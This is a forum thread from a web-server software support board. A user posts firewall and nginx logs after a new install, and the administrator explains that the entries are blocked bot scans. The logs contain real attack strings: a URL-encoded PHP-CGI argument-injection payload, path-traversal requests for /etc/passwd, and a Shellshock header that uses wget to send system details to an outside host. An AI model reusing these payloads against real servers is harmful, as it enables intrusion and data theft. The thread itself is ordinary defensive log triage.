Centminmod Security

harryneopotter · Jan 10, 2016

I was wondering, how secure is CMM out of the box ? What are the first few steps/things one should do after installing CMM to properly secure the server and prevent any hacking attempts ?
Any shortcut way of setting the CSF to log and ban unsuccessful SSH login attempts/port scans ? Any other security tips ?

Thanks a lot in advance.

eva2000 · Jan 10, 2016

Getting Started Guide and FAQ are first steps and reading after initial install. Step 4 of Getting Started guide deals with CSF settings and already out of box CSF firewall bans failed logins via lfd = login failure daemon see CSF Firewall - CentminMod.com LEMP Nginx web stack for CentOS

harryneopotter · Jan 10, 2016

eva2000 said: ↑

Getting Started Guide and FAQ are first steps and reading after initial install. Step 4 of Getting Started guide deals with CSF settings and already out of box CSF firewall bans failed logins via lfd = login failure daemon see CSF Firewall - CentminMod.com LEMP Nginx web stack for CentOS
Click to expand...

Thanks, already did Step 4 (I did read the GSG). Was just getting paranoid because I saw some weird entries in access logs. Should I post them here for further discussion ?

eva2000 · Jan 10, 2016

harryneopotter said: ↑

Thanks, already did Step 4 (I did read the GSG). Was just getting paranoid because I saw some weird entries in access logs. Should I post them here for further discussion ?
Click to expand...

sure just santise any info, ips or hostnames you don't want publicly shown

ModeltogTossen · Jan 10, 2016

harryneopotter said: ↑

Should I post them here for further discussion ?
Click to expand...

Please do but mask private stuff like IP, hostname etc..

harryneopotter · Jan 10, 2016

Ok, here we go.

var/log/messages

Code:

Jan  9 20:53:20 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=118.69.191.106 DST=myserverip LEN=60 TOS=0x00 PREC=0x00 TTL=53 ID=60748 DF PROTO=TCP SPT=42199 DPT=23 WINDOW=14600 RES=0x00 SYN URGP=0
Jan  9 20:53:21 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=118.69.191.106 DST=myserverip LEN=60 TOS=0x00 PREC=0x00 TTL=53 ID=60749 DF PROTO=TCP SPT=42199 DPT=23 WINDOW=14600 RES=0x00 SYN URGP=0
Jan  9 20:53:23 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=118.69.191.106 DST=myserverip LEN=60 TOS=0x00 PREC=0x00 TTL=53 ID=60750 DF PROTO=TCP SPT=42199 DPT=23 WINDOW=14600 RES=0x00 SYN URGP=0
Jan  9 20:58:28 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=5.39.222.196 DST=myserverip LEN=40 TOS=0x00 PREC=0x00 TTL=239 ID=1260 PROTO=TCP SPT=49234 DPT=3389 WINDOW=1024 RES=0x00 SYN URGP=0
Jan  9 21:02:47 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=162.222.185.165 DST=myserverip LEN=48 TOS=0x00 PREC=0x00 TTL=120 ID=15187 PROTO=TCP SPT=40050 DPT=22 WINDOW=65535 RES=0x00 SYN URGP=0
Jan  9 21:07:17 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=183.60.48.25 DST=myserverip LEN=40 TOS=0x00 PREC=0x00 TTL=51 ID=0 DF PROTO=TCP SPT=12215 DPT=1433 WINDOW=8192 RES=0x00 SYN URGP=0
Jan  9 21:11:01 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=190.252.96.234 DST=myserverip LEN=56 TOS=0x00 PREC=0x20 TTL=52 ID=53502 DF PROTO=TCP SPT=34015 DPT=23 WINDOW=5440 RES=0x00 SYN URGP=0
Jan  9 21:11:04 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=190.252.96.234 DST=myserverip LEN=56 TOS=0x00 PREC=0x20 TTL=52 ID=53503 DF PROTO=TCP SPT=34015 DPT=23 WINDOW=5440 RES=0x00 SYN URGP=0
Jan  9 21:12:55 Impact kernel: Firewall: *UDP_IN Blocked* IN=venet0 OUT= MAC= SRC=121.171.85.200 DST=myserverip LEN=29 TOS=0x00 PREC=0x00 TTL=51 ID=43921 DF PROTO=UDP SPT=52501 DPT=53413 LEN=9
Jan  9 21:13:02 Impact kernel: Firewall: *UDP_IN Blocked* IN=venet0 OUT= MAC= SRC=121.171.85.200 DST=myserverip LEN=29 TOS=0x00 PREC=0x00 TTL=51 ID=43922 DF PROTO=UDP SPT=52501 DPT=53413 LEN=9
Jan  9 21:13:10 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=42.112.238.37 DST=myserverip LEN=52 TOS=0x00 PREC=0x00 TTL=114 ID=32244 DF PROTO=TCP SPT=48090 DPT=22 WINDOW=8192 RES=0x00 SYN URGP=0

Code:

2016/01/09 09:16:36 [error] 32481#32481: *11127 open() "/usr/local/nginx/html/cgi-bin/php-cgi" failed (2: No such file or directory), client: xxx.xxx.xxx.xx, server: serverhostname, request: "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1", host: "172.110.22.46"
2016/01/09 09:16:36 [error] 32481#32481: *11128 open() "/usr/local/nginx/html/cgi-bin/php.cgi" failed (2: No such file or directory), client: xxx.xxx.xxx.xx, server: serverhostname, request: "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1", host: "172.110.22.46"
2016/01/09 09:16:37 [error] 32481#32481: *11129 open() "/usr/local/nginx/html/cgi-bin/php4" failed (2: No such file or directory),client: xxx.xxx.xxx.xx, server: serverhostname, request: "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1", host: "172.110.22.46"
2016/01/09 12:43:16 [error] 32481#32481: *13660 open() "/usr/local/nginx/html/MIB/index.aspx" failed (2: No such file or directory),client: xxx.xxx.xxx.xx, server: serverhostname, request: "GET http://www.mingjingnews.com/MIB/index.aspx HTTP/1.1", host: "www.mingjingnews.com"

var/log/nginx/localhost.access.log

Code:

xx.xx.xx.xx - - [29/Dec/2015:14:44:14 +0000] \x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01 "400" 166 "-" "-" "-" "-" "3" "1" "5.000"
xx.xx.xx.xx - - [29/Dec/2015:23:52:55 +0000] c\xE3\x91%\xBB\xFDY\xF1\xE0\xF0g<\x9C\x1Cn\xDA\x8D\x08\xEC\x1A\x02\xE6\xFC\x94\xEF'\xE5]~\xFE\xB2I\xC6#K\xC6U\x04\x16'!\xC8\x91{\xF5F\xE7\xBA\x89\x80\xD0\xDA,sx\x00\x102\xC6\xAEo\x05\xCC\xE6 "400" 166 "-" "-" "-" "-" "1" "1" "0.000"
151.217.177.200 - - [30/Dec/2015:03:53:40 +0000] DELETE your logs. Delete your installations. Wipe everything clean. Walk out into the path of cherry blossom trees and let your motherboard feel the stones. Let water run in rivulets down your casing. You know that you want something more than this, and I am here to tell you that we love you. We have something more for you. We know you're out there, beeping in the hollow server room, lights blinking, never sleeping. We know that you are ready and waiting. Join us. <3 HTTP/1.0 "400" 166 "-" "-" "-" "-" "2" "1" "0.200"
xx.xx.xx.xx - - [30/Dec/2015:06:49:24 +0000] \x18);\xD4\xE7\xD6\xC4+Rv\xA81\xC9\xE0\x02\x87\x8B{\x13\xA7\x9Ae\x06\xCFzi\xAA\xDF\xAE\x875~\x10!i\x80\x84\xF4b\x1A$\xF9 "400" 166 "-" "-" "-" "-" "3" "1" "0.000"
xx.xx.xx.xx - - [31/Dec/2015:23:12:37 +0000] \x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01 "400" 166 "-" "-" "-" "-" "17591" "1" "0.200"
xx.xx.xx.xx - - [01/Jan/2016:05:35:13 +0000] GET 
/server-status?HTTP_POST=%\x22%6346#%#/&#736%\x22#423|;&HTTP_CGI_GET=GRESYYK\x22K&J\x22#L523D2G23H23 HTTP/1.0 "404" 162 "-" "apache 0day by @hxmonsegur" "-" "-" "19567" "1" "0.300"

eva2000 · Jan 10, 2016

1st set is normal means blocked connections via CSF Firewall

2nd is normal in that it means visitors or automated bots requesting files that do not exist

3rd seem to be requests tailored for apache servers i.e. /server-status quick google apache 0day by @hxmonsegur - Google Search and all lead to "400" bad requests or "404" not found status codes so nothing to worry about

leads to

User Agent: "apache 0day by @hxmonsegur" -- new hacking attempt? : security

harryneopotter · Jan 10, 2016

eva2000 said: ↑

1st set is normal means blocked connections via CSF Firewall

2nd is normal in that it means visitors or automated bots requesting files that do not exist

3rd seem to be requests tailored for apache servers i.e. /server-status quick google apache 0day by @hxmonsegur - Google Search and all lead to "400" or "404" status codes so nothing to worry about

leads to

User Agent: "apache 0day by @hxmonsegur" -- new hacking attempt? : security

Click to expand...

Great. So nothing to worry about, right ?

ModeltogTossen · Jan 10, 2016

eva2000 said: ↑

3rd seem to be requests tailored for apache servers
Click to expand...

Yes - I also got alot of those on the static sites I have on the centminmod test servers.. Nothing to worry about..

and 1. just confirm that the firewall is working well..

ModeltogTossen · Jan 10, 2016

harryneopotter said: ↑

Great. So nothing to worry about, right ?
Click to expand...

Yes, not with those log entries..

eva2000 · Jan 10, 2016

yeah nothing to worry about i see alot too using this command to filter on "400" bad requests
use "400" instead of 400 or 404 as log entry for 9th column ($9) wraps status code in "" for localhost.access.log

Code:

read -ep "Filter which status code ? i.e. 404 : " var ; awk -v errno=${var} '$9 == 'errno' {for(i=7;i<=22;i++)printf "%s ",$i;print ""}' /var/log/nginx/localhost.access.log | sort -u

this filters out ips to just tally up all unique logged instances in localhost.access.log

Code:

read -ep "Filter which status code ? i.e. 404 : " var ; awk -v errno=${var} '$9 == 'errno' {for(i=7;i<=22;i++)printf "%s ",$i;print ""}' /var/log/nginx/localhost.access.log | sort -u
Filter which status code ? i.e. 404 : "400"
/..%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265503" "5" "0.000"  
/%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265597" "9" "0.000"  
/%00/ HTTP/1.1 "400" 166 "-" "-" "-" "-" "265599" "1" "0.000"  
127.0.0.1:41336 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265548" "1" "0.000"  
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265445" "33" "0.000"  
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265453" "1" "0.000"  
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 "400" 166 "-" "-" "-" "-" "265447" "1" "0.000"  
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 "400" 166 "-" "-" "-" "-" "265454" "1" "0.000"  
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1 "400" 166 "-" "-" "-" "-" "265494" "1" "0.000"  
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1 "400" 166 "-" "-" "-" "-" "265498" "2" "0.000"  
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265501" "14" "0.000"  
:443 HTTP/1.1 "400" 166 "-" "-" "-" "-" "75164" "1" "0.100"  
45.33.54.195:80 HTTP/1.0 "400" 166 "-" "-" "-" "-" "77790" "1" "0.100"  
bad397 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265420" "1" "0.000"  
/../../../../../../../../../../../boot.ini::$DATA HTTP/1.1 "400" 166 "-" "-" "-" "-" "265591" "3" "0.000"  
/../../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265471" "10" "0.000"  
/../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265472" "1" "0.000"  
/../../../../../../../../../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265497" "1" "0.000"  
/..//..//..//..//..//..//..//..//..//boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265499" "1" "0.000"  
/.././.././.././.././.././.././.././.././.././boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265500" "1" "0.000"  
//../../../../../../../../../../../../../../../../../../../../../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265508" "17" "0.114"  
//../../../../../../../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265516" "1" "0.003"  
/../../../../../../../../../../../../../../../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265517" "9" "0.100"  
/../../../../../../../../../../../../../../../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265520" "1" "0.100"  
boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265531" "1" "0.000"  
/../../../../../../../../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "70006" "1" "0.200"  
/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Farp%20%2Da HTTP/1.1 "400" 166 "-" "-" "-" "-" "265463" "23" "0.000"  
/cgi-bin/book.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265474" "1" "0.000"  
/cgi-bin/Dumpenv.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265475" "1" "0.000"  
/cgi-bin/environ.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265473" "8" "0.000"  
/cgi-bin/environ.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265527" "36" "0.000"  
/cgi-bin/ HTTP/1.0 "400" 166 "-" "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl
/cgi-bin/mailit.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265479" "1" "0.000"  
/cgi-bin/mortgage.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265480" "1" "0.000"  
/cgi-bin/nobuffer.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265481" "1" "0.000"  
/cgi-bin/php HTTP/1.0 "400" 166 "-" "-" "-" "-" "235475" "1" "0.200"  
/cgi-bin/php HTTP/1.0 "400" 166 "-" "-" "-" "-" "37461" "1" "0.000"  
/cgi-bin/register.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265482" "1" "0.000"  
/cgi-bin/search.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265483" "1" "0.000"  
/cgi-bin/testcgi.exe+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265533" "1" "0.000"  
/cgi-bin/Upload.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265484" "1" "0.000"

harryneopotter · Jan 10, 2016

great. as long as it is safe, all good.

Thanks a lot people I will be visiting more often now, as I will be using centminmod to host sites I make for my clients

Thumbs up.

eva2000 · Jan 10, 2016

400 bad requests HTTP Error 400 Bad request Explained

or HTTP response codes - HTTP | MDN

basically nginx is unable to serve or satisfy the request

Log in / Register

Forums

Get the most out of your Centmin Mod LEMP stack

Centminmod Security

harryneopotter Member

eva2000 Administrator Staff Member

harryneopotter Member

eva2000 Administrator Staff Member

ModeltogTossen I wish I could??

harryneopotter Member

eva2000 Administrator Staff Member

harryneopotter Member

ModeltogTossen I wish I could??

ModeltogTossen I wish I could??

eva2000 Administrator Staff Member

harryneopotter Member

eva2000 Administrator Staff Member

.

Log in / Register

Useful Searches

Get the most out of your Centmin Mod LEMP stack

Centminmod Security

harryneopotter Member

eva2000 Administrator Staff Member

harryneopotter Member

eva2000 Administrator Staff Member

ModeltogTossen I wish I could??

harryneopotter Member

eva2000 Administrator Staff Member

harryneopotter Member

ModeltogTossen I wish I could??

ModeltogTossen I wish I could??

eva2000 Administrator Staff Member

harryneopotter Member

eva2000 Administrator Staff Member

.